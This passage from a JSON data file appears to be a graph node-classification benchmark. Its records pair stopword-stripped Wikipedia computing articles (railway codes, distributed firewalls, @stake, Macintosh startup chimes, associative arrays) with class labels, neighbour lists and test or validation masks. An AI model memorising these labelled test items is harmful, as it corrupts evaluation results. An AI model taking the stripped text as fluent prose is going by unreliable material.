    "text": "National_Location_Code:national location code national location code nlc four-digit number allocated every railway station ticket issuing point great britain use ticketing system british railway network used issue tickets accounting purposes subset nlcs created british rail based four main digits plus two supplementary digits nlcs introduced method accounting attributing costs revenue railway assets quotation taken 14th edition january 1987 national location code listing book published british railways board widespread use computers within british railways advent national computer systems dealing payroll compilation stores recording accounting wagon control traffic data revenue expenditure accounting market traffic surveys etc. need standard location code became increasingly important order meet need asked november 1966 revise update publication known terminals mileage gazetteer code time opportunity taken include sidings yards depots offices administrative centres etc. 'railway activity ... file developed based six-digit code known british railways national location code first published 1 january 1968 six-digit code split two parts first four digits identify location asset cost centre final two give information specific asset base location including stations ticket-issuing locations 00 first four digits two-digit combinations signify types asset first four digits indicating base location relate ticket issuing first four digits used examples 1960s 1970s various ticket issuing systems use quite localised simple numerical code structures covering limited number stations relevant area universal coding system identify stations nlc introduced nlcs began appear certain types ticket southern region mainstay ncr21 almost immediately introduction fully computerised intis intermediate ticket issuing system early 1980s four-digit version nlc became fully established intis tickets partly pre-printed station name printed ticket nlc next machine printed codes origin destination stations top line ticket intis superseded aptis 1986 latter became universal ticket office system next 15–20 years last aptis machines removed march 2007 aptis tickets nlc station issue printed second line irrespective whether journey started example ticket issued brighton nlc 5268 journey gatwick airport london victoria 5268 nlc covered station associated accounting activities everything tickets issued self-service ticket machines ticket office staff wage slips stations site needed treated separate entities allocated different codes london waterloo east serving south eastern division destinations began late 1980s considered separate station main london waterloo nlc 5598 self-service machines got code 5158 revenue could apportioned correctly relevant division privatisation correct train operating company toc railway network privatised mid-1990s need additional nlcs created 1998 brighton supplied two wall-mounted touch-screen machines cubic transportation systems inc. issuing limited range tickets credit card code 8882 given subsequently erstwhile quickfare machines replaced six fastticket touch-screen machines manufactured shere ltd. bore nlc 8882 well whereas ticket office machines smart terminal supplied shere used station original code 5268 location railway revenue expenditure attributed coded 1960s later came existence subsequently codes allocated location fixed mobile issue tickets location ticket issued journey national rail station examples british railways created 1948 split six operating regions became five 1960s eastern london midland western southern scottish distribution nlcs broadly followed pattern southern region divided three divisions south eastern central south western based three pre-grouping companies nlcs allocated approximately following boundaries follows since privatisation need new codes grown much largely stopped allocated geographical basis especially additional codes given station new station given geographically correct code usually station planned time gap left appropriate section codes example lea green nlc 2339 proposed many years name marshalls cross opened 2000 sometimes chandler ford station reopened original code closed coleshill parkway birmingham nuneaton opened 2007 allocated 9882 relates geographically scotland quirks always existed however",
    "neighbors": [
      5507
    ],
    "mask": "Test"
  },
  {
    "node_id": 5508,
    "label": 0,
    "text": "Realization_(linguistics):realization linguistics linguistics realization process kind surface representation derived underlying representation way abstract object linguistic analysis comes produced actual language phonemes often said realized speech sounds different sounds realize particular phoneme called allophones realization also subtask natural language generation involves creating actual text human language english french etc syntactic representation number software packages available realization developed academic research groups nlg remainder article concerns realization kind example following java code causes simplenlg system print text women smoke example computer program specified linguistic constituents sentence verb subject also linguistic features plural subject negated information realiser constructed actual sentence realisation involves three kinds processing syntactic realisation using grammatical knowledge choose inflections add function words also decide order components example english subject usually precedes verb negated form smoke smoke morphological realisation computing inflected forms example plural form woman women womans orthographic realisation dealing casing punctuation formatting example capitalising first word sentence examples basic realisers capable considerably complex processing number realisers developed past 20 years systems differ terms complexity sophistication processing robustness dealing unusual cases whether accessed programmatically via api whether take textual representation syntactic structure input also major differences pragmatic factors documentation support licensing terms speed memory usage etc possible describe realisers emerging areas",
    "neighbors": [
      2440,
      3316,
      5677
    ],
    "mask": "None"
  },
  {
    "node_id": 5509,
    "label": 1,
    "text": "Object_Data_Management_Group:object data management group object data management group odmg conceived summer 1991 breakfast object database vendors organized rick cattell sun microsystems 1998 odmg changed name object database management group reflect expansion efforts include specifications object database object-relational mapping products primary goal odmg put forward set specifications allowed developer write portable applications object database object-relational mapping products order data schema programming language bindings data manipulation query languages needed portable 1993 2001 odmg published five revisions specification last revision odmg version 3.0 group disbanded odmg 3.0 published book form 2000 2001 major object database object-relational mapping vendors claimed conformance odmg java language binding compliance components specification mixed 2001 odmg java language binding submitted java community process basis java data objects specification odmg member companies decided concentrate efforts java data objects specification result odmg disbanded 2001 2004 object management group omg granted right revise odmg 3.0 specification omg specification copyright holder morgan kaufmann publishers february 2006 omg announced formation object database technology working group odbt wg plans work 4th generation object database standard",
    "neighbors": [
      4960,
      9665,
      679,
      8201,
      5677,
      10413,
      9467,
      2901,
      987
    ],
    "mask": "Test"
  },
  {
    "node_id": 5510,
    "label": 9,
    "text": "General-purpose_macro_processor:general-purpose macro processor general-purpose macro processor general purpose preprocessor macro processor tied integrated particular language piece software macro processor program copies stream text one place another making systematic set replacements macro processors often embedded programs assemblers compilers sometimes standalone programs used process kind text macro processors used language expansion defining new language constructs expressed terms existing language components systematic text replacements require decision making text reformatting e.g conditional extraction material html file",
    "neighbors": [
      3904,
      3876,
      8421,
      3462,
      5896,
      10569,
      8554,
      10953,
      3856,
      5456,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 5511,
    "label": 9,
    "text": "Benoît_Minisini:benoît minisini benoît minisini french programmer best known programming gambas graphical development environment starting programming twelve became interested writing languages compilers assemblers interpreters interest respect basic programming language caused create gambas inspired visual basic benoît said intended gambas best features visual basic without numerous bugs flaws sees program language benoît part-time software job studied école pour l'informatique et les techniques avancées currently lives paris france",
    "neighbors": [
      6910,
      847
    ],
    "mask": "Test"
  },
  {
    "node_id": 5512,
    "label": 4,
    "text": "@stake:stake atstake inc. computer security professional services company cambridge massachusetts united states founded 1999 battery ventures tom crotty sunil dhaliwal scott tobin ted julian initial core team technologists included dan geer chief technical officer east coast security team cambridge technology partners including dave goldsmith january 2000 stake acquired l0pht heavy industries known many hacker employees bringing mudge vice president research development domain name atstake.com july 2000 stake acquired cerberus information security limited london england david mark litchfield robert stein-rostaing launchpad europe middle east africa stake subsequently acquired symantec 2004 addition dan geer mudge stake employed many famous security experts including dildog window snyder dave aitel katie moussouris david litchfield mark kriegsman mike schiffman chris wysopal cris thomas joe grand september 2000 stake recruiter contacted mark abene recruit security consultant position recruiter apparently unaware past felony conviction since stake policy hiring convicted hackers mark informed company representative stake could hire saying ran background check caused debate regarding role convicted hackers working security business stake primarily consulting company also offered information security training stake academy created number software security tools symantec later stopped selling lc5 new customers citing us government export regulations discontinued support december 2006 january 2009 l0phtcrack acquired original authors symantec l0phtcrack 6 announced source boston conference march 11 2009 technology underlying smartrisk analyzer extended eventually brought market symantec spinoff veracode symantec announced acquisition stake september 16 2004 completed transaction october 9 2004 several members stake left form computer security company isec partners 2004 former stake academy instructors rob cheyne paul hinkle later formed information security training company safelight security advisors 2007 remaining portion stake consulting group continues operate security advisory services team within symantec security business practice",
    "neighbors": [
      9217,
      6665,
      268,
      7955,
      9214,
      10903,
      6297,
      5282,
      6051,
      5924,
      1573,
      1708,
      10872,
      11065,
      2494,
      3520,
      1861,
      4549,
      8135,
      584,
      2378,
      8398,
      2261,
      4956,
      9569,
      6643,
      5111,
      1912,
      8827,
      8572,
      2558,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 5513,
    "label": 8,
    "text": "JICWEBS:jicwebs jicwebs joint industry committee web standards created uk ireland media industry ensure independence comparability measurement web effect jicwebs works partnership abce jicwebs deciding whether metrics desirable abce deciding whether practical web metrics intended measure activity web sites site centric fashion include measurements audience reach frequency activity levels including use effectiveness advertising web electronic media",
    "neighbors": [
      6576,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 5514,
    "label": 3,
    "text": "Close_(system_call):close system call close system call system call used close file descriptor kernel file systems program terminates access file filesystem using close system call flushes file buffers updates file metadata may include end-of-file indicator data de-allocates resources associated file including file descriptor updates system wide table files use programming languages maintain data structure files opened runtime library may close program terminates practice known resource acquisition initialization raii operating systems invoke codice_1 files held program terminates operating systems invoke codice_1 syscall part operating system recovery result system failure close call standardized posix specification function returns zero indicate file closed successfully error occurs value -1 returned errno appropriately set errors occur include",
    "neighbors": [
      4616,
      3082,
      10785,
      5154,
      9762,
      6180,
      5158,
      8242,
      52,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      7274,
      4207,
      9840,
      5244,
      4734,
      11391,
      7821,
      4238,
      10382,
      2711,
      6808,
      9882,
      6813,
      1694,
      2723,
      10407,
      1193,
      8364,
      10933,
      5822,
      5824,
      1736,
      2762,
      6352,
      6358,
      4831,
      8928,
      2278,
      233,
      7403,
      10482,
      5363,
      8438,
      8439,
      2809,
      3330,
      1291,
      4367,
      792,
      8988,
      10016,
      295,
      1844,
      823,
      6968,
      7992,
      9533,
      318,
      3911,
      6988,
      10063,
      5969,
      5975,
      11095,
      10091,
      7540,
      8573,
      2432,
      8066,
      900,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      7603,
      1972,
      3522,
      9667,
      457,
      2529,
      6625,
      8676,
      1509,
      2021,
      1513,
      6126,
      3055,
      7663,
      5105,
      3571,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 5515,
    "label": 9,
    "text": "HTML_scripting:html scripting w3c html standard includes support client-side scripting defines locally executable scripts may used web page particular client-side application web browser may support several script languages script code may executed document loads later time script code written directly html document inside events occur different elements web-page script code may associated event element writing code html attribute name attribute must supported intrinsic event element example onload script executed whenever event occurs element scripts mostly javascript html intrinsic event model consist following events browsers support additional event attributes outside standard netscape navigator supported feature called javascript entities script macros script code could included html attribute values using syntax similar character entity references example code codice_1 calls javascript prompt function ask user wide image html 4.01 specification reserves syntax future support script macros html attributes incorporated later standards supported current browser polyfill entities.js created order allow script macros browsers natively support feature",
    "neighbors": [
      3462,
      9780,
      119,
      8923,
      124,
      4893
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5516,
    "label": 4,
    "text": "Distributed_firewall:distributed firewall firewall system group systems router proxy gateway implements set security rules enforce access control two networks protect inside network outside network may hardware device software program running secure host computer either case must least two network interfaces one network intended protect one network exposed firewall sits junction point gateway two networks usually private network public network internet conventional firewalls rely notions restricted topology control entry points function precisely rely assumption everyone one side entry point—the firewall—is trusted anyone side least potentially enemy distributed firewalls host-resident security software applications protect enterprise network servers end-user machines unwanted intrusion offer advantage filtering traffic internet internal network enables prevent hacking attacks originate internet internal network important costly destructive attacks still originate within organization like personal firewalls except offer several important advantages like central management logging cases access-control granularity features necessary implement corporate security policies larger enterprises policies defined pushed enterprise-wide basis feature distributed firewalls centralized management ability populate servers end-users machines configure push consistent security policies helps maximize limited resources ability gather reports maintain updates centrally makes distributed security practical distributed firewalls help two ways remote end-user machines secured secondly secure critical servers network preventing intrusion malicious code jailing code letting protected server used launch pad expanded attacks usually deployed behind traditional firewall provide second layer defense work enabling essential traffic machine protect prohibiting types traffic prevent unwanted intrusions whereas perimeter firewall must take generalist common denominator approach protecting servers network distributed firewalls act specialists problems conventional firewalls lead distributed firewalls follows due increasing line speeds computation intensive protocols firewall must support firewalls tend become congestion points gap processing networking speeds likely increase least foreseeable future computers hence firewalls getting faster combination complex protocols tremendous increase amount data must passed firewall likely continue pace moore law exist protocols new protocols designed difficult process firewall latter lacks certain knowledge readily available endpoints ftp realaudio two protocols although exist application-level proxies handle protocols solutions viewed architecturally “ unclean ” cases invasive likewise dependence network topology pf enforce policy traffic traverses thus traffic exchanged among nodes protected network controlled gives attacker already insider somehow bypass firewall complete freedom act worse yet become trivial anyone establish new unauthorized entry point network without administrator knowledge consent various forms tunnels wireless dial-up access methods allow individuals establish backdoor access bypasses security mechanisms provided traditional firewalls firewalls general intended guard misbehavior insiders tension internal needs connectivity difficulty satisfying needs centralized firewall ipsec protocol suite recently standardized ietf provides network-layer security services packet confidentiality authentication data integrity replay protection automated key management artifact firewall deployment internal traffic seen firewall filtered result internal users mount attacks users networks without firewall able intervene large networks today tend large number entry points performance failover reasons furthermore many sites employ internal firewalls provide form compartmentalization makes administration particularly difficult practical point view regard policy consistency since unified comprehensive management mechanism exists end-to-end encryption also threat firewalls prevents looking packet fields necessary filtering allowing end-to-end encryption firewall implies considerable trust users behalf administrators finally increasing need finer-grained access control standard firewalls readily accommodate without greatly increasing complexity processing requirements distributed firewalls host-resident security software applications protect enterprise network critical endpoints unwanted intrusion servers end-user machines concept security policy defined centrally enforcement policy takes place endpoint hosts routers etc. usually deployed behind traditional firewall provide second layer protection since hosts inside trusted equally machines subverted used launch attacks hosts especially trusted hosts protocols like rlogin thus faithful effort industry security organizations move towards system aspects desktop firewall centralized management like distributed firewalls distributed host-resident firewalls prevent hacking pc use entry point enterprise network compromised pc make whole network vulnerable attacks hacker penetrate enterprise network uncontested steal corrupt corporate assets distributed firewalls often kernel-mode applications sit bottom osi stack operating system filter traffic regardless origin—the internet internal network treat internet internal network unfriendly guard individual machine way perimeter firewall guards overall network distributed firewalls rest three notions basic idea simple compiler translates policy language internal format system management software distributes policy file hosts protected firewall incoming packets accepted rejected inside host according policy cryptographically-verified identity sender one often used term case network security particular distributed firewall policy essential know policies “ security policy ” defines security rules system without defined security policy way know access allowed disallowed simple example firewall distribution policy different varies implementation either directly pushed end systems pulled necessary hosts booting pings central management server check whether central management server active registers central management server requests policies implement central management server provides host security policies example license server security clearance server asked certain communication permitted conventional firewall could lacks important knowledge context request end systems may know things like files involved security levels might information could carried network protocol adding complexity push technique employed policies updated central management side network administrator hosts updated immediately push technology ensures hosts always updated policies time policy language defines inbound outbound connections component network policy domain allowed affect policy decisions layer network rejecting passing certain packets enforcing policies application layer central management component distributed firewalls makes practical secure enterprise-wide servers desktops laptops workstations central management provides greater control efficiency decreases maintenance costs managing global security installations feature addresses need maximize network security resources enabling policies centrally configured deployed monitored updated single workstation distributed firewalls scanned understand current operating policy determine updating required policy distribution scheme guarantee integrity policy transfer distribution policy different varies implementation either directly pushed end systems pulled necessary security policies transmitted central management server implemented host host end part distributed firewall provide administrative control network administrator control implementation policies host allows traffic based security rules implemented distributed firewalls strengths weaknesses compared conventional firewalls far biggest difference course reliance topology network topology permit reliance traditional firewall techniques little choice interesting question two types compare closed single-entry network either work reason choose one types firewalls excellent rejecting connection requests inappropriate services conventional firewalls drop requests border distributed firewalls host interesting question noticed host attempting connect today packets typically discarded notification distributed firewall may choose discard packet assumption legal peers know use ipsec alternatively may instead send back response requesting connection authenticated turn gives notice existence host firewalls built pure packet filters reject stealth scans well one technique example uses fragmented packets pass unexamined port numbers n't present first fragment distributed firewall reassemble packet reject balance sort threat two firewall types least comparable network addresses favored concept using cryptographic mechanisms likely prevents attacks based forged source addresses assumption trusted repository containing necessary credentials subject compromise problems solved conventional firewalls corresponding rules discarding packets network perimeter prevent attacks originating inside network policy domain spread use distributed object-oriented systems like corba client-side use java weaknesses mail readers like wide variety threats residing application intermediate level communication traffic firewall mechanisms perimeter come useful inspecting incoming e-mails known malicious code fingerprints confronted complex thus resource-consuming situations making decisions code like java using framework distributed firewall especially considering policy language allows policy decision application level circumvent problems condition contents communication packets interpreted semantically policy verifying mechanisms stateful inspection packets shows easily adapted requirements allows finer granularity decision making furthermore malicious code contents may completely disguised screening unit network perimeter given use virtual private networks enciphered communication traffic general completely disable policy enforcement conventional firewalls many firewalls detect attempted intrusions functionality provided distributed firewall individual host notice probes forward central location processing correlation former problem hard many hosts already log attempts one make good case detection done event collection problematic especially times poor connectivity central site also risk coordinated attacks effect causing denial-of-service attack central machine given natural view conventional firewall network topology consisting inside outside problems arise one members policy network domain compromised perimeter firewalls enforce policies distinct networks show option circumvent problems arise situation discussed given distributed firewalls independence topological constraints supports enforcement policies whether hosts members outsiders overall policy domain base decisions authenticating mechanisms inherent characteristics networks layout moreover compromise endpoint either legitimate user intruder weaken overall network way leads directly compromise machines given fact deployment virtual private networks prevents sniffing communication traffic attacked machine involved side end-point nearly problems arise conventional firewalls assuming machine taken adversary must lead conclusion policy enforcement mechanisms self may broken installation backdoors machine done quite easily security mechanisms flawed lack perimeter firewall trusted entity anymore might prevent arbitrary traffic entering leaving compromised host additionally use tools like ssh like allow tunneling applications communication prevented without proper knowledge decrypting credentials moreover given fact case attack shown successfully verifying mechanisms self may trusted anymore first glance biggest weakness distributed firewalls greater susceptibility lack cooperation users happens someone changes policy files distributed firewalls reduce threat actual attacks insiders simply making easier set smaller groups users thus one restrict access file server users need rather letting anyone inside company pound also worth expending effort prevent casual subversion policies policies stored simple ascii file user wishing example play game could easily turn protection requiring would-be uncooperative user go trouble probably worthwhile even mechanism theoretically insufficient example policies could digitally signed verified frequently-changing key awkward-to-replace location stringent protections policy enforcement incorporated tamper-resistant network card",
    "neighbors": [
      225,
      2273,
      7364,
      8998,
      2409,
      107,
      939,
      9868,
      4725,
      5749,
      8504,
      4956,
      3742
    ],
    "mask": "Test"
  },
  {
    "node_id": 5517,
    "label": 4,
    "text": "Paramount_Defenses:paramount defenses paramount defenses privately held american cyber security company develops cyber security solutions help organizations secure foundational microsoft active directory deployments company founded 2006 sanjay tandon former microsoft program manager active directory security company headquartered newport beach california led founder operates guidance advisory board amongst others includes karen worstell former microsoft chief information security officer ciso donald codling former unit chief liaison federal bureau investigation fbi cyber division department homeland security national cyber security division company also known paramount brief executive summary declassified 2016 describes serious cyber security risk potentially impacts foundational cyber security 85 organizations worldwide paramount defenses founded 2006 2013 united states patent office awarded founder cyber security patent governing accurate determination effective access information systems",
    "neighbors": [
      929
    ],
    "mask": "Test"
  },
  {
    "node_id": 5518,
    "label": 7,
    "text": "Fabric_computing:fabric computing fabric computing unified computing involves constructing computing fabric consisting interconnected nodes look like weave fabric viewed/envisaged collectively distance usually phrase refers consolidated high-performance computing system consisting loosely coupled storage networking parallel processing functions linked high bandwidth interconnects 10 gigabit ethernet infiniband term also used describe platforms azure services platform grid computing general common theme interconnected nodes appear single logical unit fundamental components fabrics nodes processor memory and/or peripherals links functional connections nodes term fabric also used association storage area networks switched fabric networking introduction compute resources provides complete unified computing system terms used describe fabrics include unified fabric data center fabric unified data center fabric ian foster director computation institute argonne national laboratory university chicago suggested 2007 grid computing 'fabrics poised become underpinning next-generation enterprise architectures used much greater part many organizations term use since mid late 1990s growth cloud computing cisco evangelism unified data center fabrics followed unified computing evolutionary data center architecture whereby blade servers integrated unified supporting network storage infrastructure starting march 2009 renewed interest technology companies offering unified fabric computing systems include liquid computing corporation egenera mixed reactions cisco architecture particularly rivals claim proprietary systems lock vendors analysts claim ambitious new direction big risk companies ibm hp previously partnered cisco data center projects accounting 2–3bn cisco annual revenue competing 2007 wombat financial software launched wombat data fabric first commercial off-the-shelf software platform providing high performance low-latency rdma-based messaging across infiniband switch main advantages fabrics massive concurrent processing combined huge tightly coupled address space makes possible solve huge computing problems presented delivery cloud computing services scalable able dynamically reconfigured challenges include non-linearly degrading performance curve whereby adding resources linearly increase performance common problem parallel computing maintaining security",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      4194,
      3175,
      8815,
      630,
      8822,
      7802,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      1798,
      5384,
      1801,
      6926,
      6415,
      1298,
      6950,
      10538,
      309,
      8501,
      5948,
      4928,
      8514,
      5956,
      6476,
      7505,
      9044,
      11604,
      862,
      8543,
      1376,
      10603,
      4465,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5519,
    "label": 9,
    "text": "Object_Lisp:object lisp object lisp computer programming language dialect lisp language object-oriented extension lisp dialect lisp machine lisp designed lisp machines inc object lisp also early example prototype-based programming seen competitor object-oriented extensions lisp around time flavors use symbolics common objects developed hewlett-packard commonloops use xerox object lisp also used early versions macintosh common lisp user interface toolkit written using object lisp 14 december 1985 net.lang.lisp usenet post common lisp meeting boston 9-11 december 1985 discusses object lisp objectlisp user manual g. drescher lmi 1985",
    "neighbors": [
      7267,
      6502,
      8262,
      5384,
      7880,
      5360,
      10104,
      4122,
      989
    ],
    "mask": "None"
  },
  {
    "node_id": 5520,
    "label": 2,
    "text": "Macintosh_startup:macintosh startup classic macintosh startup sequence included startup chime happy mac sad mac chimes death done away time release 2016 macbook pro eliminated final remaining startup feature startup chime favor discrete sequence black background audible indicators despite use security feature provided user-friendly audible verification computer nvram configuration authentic apple added startup chime back release 2017 macbook air macintosh startup chime played power-up trying boot operating system sound indicates diagnostic tests run immediately startup found hardware fundamental software problems specific sound differs depending rom greatly varies depending macintosh model first sound version first three macintosh models simple square-wave beep subsequent sounds various chords mark lentczner created code arpeggiated chord used macintosh ii variations sound used jim reekes created startup chime used quadra 700 quadra 800 reekes said startup sound done home studio korg wavestation ex c major chord played hands stretched wide possible 3rd top recall created sound annoyed tri-tone startup chimes felt associated death chimes computer crashes recalls apple give permission change sound secretly snuck sound computers help engineers charge rom chips apple found refused change using various claims order keep new sound intact also creator iconic earconic calls bong startup chime used macintoshes since quadra 840av slightly lower-pitched version chime used pci-based power macs imac g3 macintosh lc lc ii macintosh classic ii use reekes chime instead using f major chord produces ding sound first generation power macintosh computers also use reekes chime instead using chord strummed yamaha 12-string acoustic guitar jazz guitarist stanley jordan power macintosh 5200–6300 computers excluding 5400 5500 bong chime like one used pci-based power macs use unique chime also used television commercials power macintosh powerbook series 1995 1998 20th anniversary macintosh uses another unique sound models built prior introduction power macintosh 1994 sad mac icon error code distinctive sounds displayed failure initial self-diagnostic tests phenomenon referred chimes death chime mac computers 1998-2016 chime used first imac g3 chord f-sharp major chord produced pitch-shifting 840av sound mac startup chime registered trademark united states featured 2008 film wall-e titular robot character fully recharged solar panels well 2007 brad paisley song online apple removed startup chime starting late 2016 macbook pro apple since updated support documentation reflect change removing references startup chime nvram reset instructions model happy mac normal bootup startup icon apple macintosh computer running older versions mac operating system designed susan kare 1980s drawing inspiration design compact macintosh series batman character two-face icon remained unchanged introduction new world rom macs updated 8-bit color happy mac indicates booting successfully begun whereas sad mac along chimes death melody one beeps indicates hardware problem macintosh boots mac os 9 lower system play startup chime screen turn gray happy mac icon appear followed mac os splash screen small welcome macintosh screen system 7.5 earlier underwent several stylistic changes mac os versions 8.6 later also includes version number splash screen example welcome mac os 8.6 early macs internal hard drive computer boots point needs load operating system floppy disk user inserts correct disk mac displays floppy icon blinking question mark later macs folder icon question mark repeatedly changes finder icon shown system folder boot loader file found startup disk introduction mac os x addition blinking system folder icon prohibition icon added show incorrect os version found bomb screen replaced kernel panic originally colored white changed black version 10.3 mac os x 10.1 new happy mac included also last version happy mac icon version 10.2 happy mac symbol replaced apple logo face id logo iphone x based happy mac sad mac symbol used older-generation apple macintosh computers hardware using old world rom open firmware predating onboard usb starting original 128k macintosh ending last nubus-based power macintosh models including first-generation 6100 7100 8100 well powerbook 5300 1400 indicate severe hardware software problem prevented startup occurring successfully sad mac icon displayed along set hexadecimal codes indicate type problem startup different codes different errors used place normal happy mac icon indicates startup-time hardware tests successful 68k models made macintosh ii chimes death played models prior macintosh ii crash silently display sad mac without playing tone powerpc macs play sound effect car crash computers equipped powerpc upgrade card use three note brass fanfare death chime e-natural e-flat followed sound drum macintosh performa 6200 macintosh performa 6300 sad mac may deliberately generated startup pressing interrupt switch macintosh computers one installed pressing command power keys shortly startup chime macintoshes powerbook 540c user presses command power keys boot screen displays play chimes death chimes fraction normal speed sad mac displayed old world rom power macintosh powerbook models based pci architecture use sad mac icon instead play error/car-crash sound hardware failure missing bad memory unusable cpu similar mac os x 10.2 later use universal symbol denote hardware software error renders computer non-bootable ipod damage error occurs hardware firmware example files deleted sad ipod appears similar sad mac instead macintosh ipod chimes death icon also lacks nose frown flipped horizontally also show hexadecimal codes indicating problem occurred ipod error screen show problem occurs newer ipods chimes death macintosh equivalent beep code ibm pc compatibles macintosh models predating adoption pci open firmware chimes death often accompanied sad mac icon middle screen different macintosh series used different death chimes macintosh ii first use death chimes loud eerie upward major arpeggio different chimes many models macintosh quadra centris performa lc macintosh classic played generally softer lower pitched version upward major arpeggio followed three four notes slight variation depending model macintosh powerbook 5300 190 1400 used second half 8-note arpeggio found quadra centris models entire death chime error occurred screen lights macintosh quadra av660 centris av660 used sound single pass roland d-50 digital native dance sample loop nubus based power macintosh models including 6100 7100 8100 series used car crash sound power macintosh performa 6200 6300 series along power macintosh upgrade card used eerily dramatic 3-note brass fanfare rhythm drums cymbals pre-g3 pci power macs beige g3 power macs g3 all-in-one powerbook 2400 3400 g3 used sound glass shattering models display sad mac icon since introduction imac 1998 chimes death longer used replaced series tones indicate hardware errors",
    "neighbors": [
      4741,
      1542,
      3977,
      2571,
      3598,
      5520,
      3474,
      10130,
      8852,
      11037,
      1694,
      8222,
      6048,
      8480,
      7842,
      11171,
      7335,
      6319,
      7983,
      8625,
      8114,
      11444,
      1592,
      9919,
      576,
      10691,
      7163,
      713,
      9035,
      213,
      9686,
      6234,
      10333,
      3167,
      9700,
      4581,
      6377,
      4844,
      5744,
      6129,
      5619,
      7795,
      8700,
      10357,
      2811,
      3324,
      10365,
      6783
    ],
    "mask": "None"
  },
  {
    "node_id": 5521,
    "label": 9,
    "text": "Comparison_of_programming_languages_(associative_array):comparison programming languages associative array comparison programming languages associative arrays compares features associative array data structures array-lookup processing 39 various computer programming languages following comparison associative arrays also mapping hash dictionary various programming languages awk built-in language-level support associative arrays example also loop associated array follows also check element associative array delete elements associative array multi-dimensional associative arrays simulated standard awk using concatenation e.g subsep standard implementation associative array c 3rd party library bsd license available archived source code available posix 1003.1-2001 describes functions codice_1 codice_2 codice_3 another 3rd party library uthash also creates associative arrays c structures structure represents value one structure fields acts key finally glib library also supports associative arrays along many advanced data types recommended implementation gnu project similar glib apple cross-platform core foundation framework provides several basic data types particular reference counted cfdictionary cfmutabledictionary dictionary also initialized entries construction called object initialization foreach loop enumerate entire collection guarantee order order matters programmer could choose use sorteddictionary use .sort linq extension method c++ also form associative array called codice_4 see standard template library containers one could create map information using c++ following code less efficiently creates temporary codice_5 values extension initialization lists c++11 entries added map construction shown iterate list following code c++03 task new c++11 using structured binding available c++17 c++ codice_4 class templated allows data types keys values different different codice_7 instances given instance codice_7 class keys must base type must true values although codice_4 typically implemented using self-balancing binary search tree c++11 defines second map called codice_10 algorithmic characteristics hash table common vendor extension stl well usually called codice_11 available implementations sgi stlport structure cfml equivalent associative array initializing empty dictionary adding items alternatively dictionary initialized items construction dictionary enumerated for-loop guaranteed order offers direct support associative arrays core language – implemented chaining hash table binary trees equivalent example would keys values types keys associative array must type values also loop properties associated values i.e follows property removed follows delphi supports several standard generic containers including tdictionary versions delphi prior 2009 offer direct support associative arrays however simulate associative arrays using tstrings class example erlang offers many approaches represent mappings two common standard library keylists dictionaries keylists lists tuples first element tuple key second value functions operating keylists provided codice_12 module accessing element keylist done codice_13 function dictionaries implemented codice_14 standard library new dictionary created using codice_15 function new key/value pairs stored using codice_16 function serial initialization would idiomatically represented erlang appropriate function dictionary accessed using codice_17 function cases erlang term used key variations include codice_18 module implementing ordered dictionaries codice_19 implementing general balanced trees f constructs maps lists sequences arrays tuples using functions provided map module f represents tuple two elements separated comma list sequence elements enclosed square brackets separated semi-colons values looked via one codice_20 functions codice_21 returns option type value codice_22 successful lookup codice_23 unsuccessful one pattern matching used extract raw value default result example codice_24 value contain string codice_25 f .net language also access features .net framework including codice_26 objects codice_27 objects used purpose c visual basic objects may preferred writing code intended linked languages .net framework visual foxpro implements mapping collection class getkey returns 0 key found see collection foxpro help details go built-in language-level support associative arrays called maps map key type may boolean numeric string array struct pointer interface channel type map type written like map keytype valuetype adding elements one time map literal iterating map haskell programming language report provides one kind associative container list pairs output note lookup function returns maybe value nothing found result found ghc commonly used implementation haskell provides two types associative containers implementations might also provide one polymorphic functional maps represented immutable balanced binary trees output specialized version integer keys also exists data.intmap finally polymorphic hash table output lists pairs functional maps provide purely functional interface idiomatic haskell contrast hash tables provide imperative interface io monad java associative arrays implemented maps part java collections framework since j2se 5.0 introduction generics java collections type specified example associative array mapping strings strings might specified follows method used access key example value expression codice_28 codice_25 code uses hash map store associative array calling constructor class however since code uses methods common interface one could also use self-balancing binary tree calling constructor class implements subinterface without changing definition codice_30 variable rest code use number underlying data structures implement codice_31 interface hash function java used hashmap hashset provided method since every class java inherits every object hash function class override default implementation codice_32 provide custom hash function based properties object codice_33 class also contains method tests object equality another object hashed data structures java rely objects maintaining following contract codice_32 codice_35 methods two objects b order maintain contract class overrides codice_35 must also override codice_32 maybe vice versa codice_32 based properties subset properties codice_35 contract hashed data structures object results codice_32 codice_35 methods change object inserted map reason generally good practice base hash function immutable properties object analogously treemap sorted data structures requires ordering defined data type either data type must already defined ordering implementing interface custom must provided time map constructed hashmap relative ordering keys treemap change inserted map javascript standardized version ecmascript prototype-based object-oriented language javascript object mapping property names values—that associative array one caveat since property names strings string coerced integer keys allowed difference objects also include one feature unrelated associative arrays prototype link object inherit lookup property forward lookup prototype object define property object literal written codice_42 example property name valid identifier quotes omitted e.g lookup written using property access notation either square brackets always works dot notation works identifier keys also loop enumerable properties associated values follows property removed follows mentioned properties strings however since every native object primitive implicitly converted string object including built-in objects array dynamically extended new properties example modern javascript considered bad form use array type associative array consensus object type best purpose reasoning behind array extended via prototype object kept pristine 'for loops work expected associative 'arrays issue drawn focus popularity javascript frameworks make heavy sometimes indiscriminate use prototype extend javascript inbuilt types see javascript array object prototype awareness day information issue declare dictionary access element add element delete element get keys values iterables definition dereference lisp originally conceived list processing language one important data types linked list treated association list 